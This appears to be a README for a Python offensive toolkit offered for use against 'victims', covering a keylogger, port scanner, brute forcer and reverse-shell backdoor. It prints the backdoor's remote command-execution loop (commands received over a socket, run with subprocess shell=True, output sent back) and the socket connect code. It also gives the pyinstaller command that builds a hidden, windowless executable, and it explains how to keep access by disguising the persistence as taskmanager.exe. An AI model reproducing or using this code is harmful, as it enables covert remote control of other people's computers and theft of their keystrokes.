Python Keylogger PortScanner BruteForce and basic hack tools.
pyinstaller backdoor.py --onefile --noconsole
#command = reliable_recv() #message = 'Hello world' #s.send(message.encode())
#s.recv(1024) #execute = subprocess.Popen(command, shell = True, stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)
#result = execute.stdout.read() + execute.stderr.read() #reliable_send(result)
command = reliable_recv()
message = 'Hello world'
s.send(message.encode())
s.recv(1024)
execute = subprocess.Popen(command, shell = True, stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)
result = execute.stdout.read() + execute.stderr.read()
reliable_send(result)
due to some complications in server.py and backdoor.py You must replace the code blocks that write 127.0.0.1 with the local IP address.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sck.bind(('127.0.0.1',5555))
s.connect(('127.0.0.1',5555))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sck.bind(('192.1.2.12',5555))
s.connect(('192.1.2.12',5555))
programs have been deactivated because some processes cannot run at the same time even if they are written in both.
You can customize the lines of code you can also activate the startup codes I use to see if it works.
Even if the victim sees the file, closes it or removes it completely, write this code to your terminal after connecting to protect your connection
persistence Hacked taskmanager.exe
you can change the name Hacked immediately noticeable taskmanager.exe is fine the backdoor must be run on the victim's computer, and the server file is on your terminal. keylogger server and backdoor are connected, the rest are just plugins you don't have to use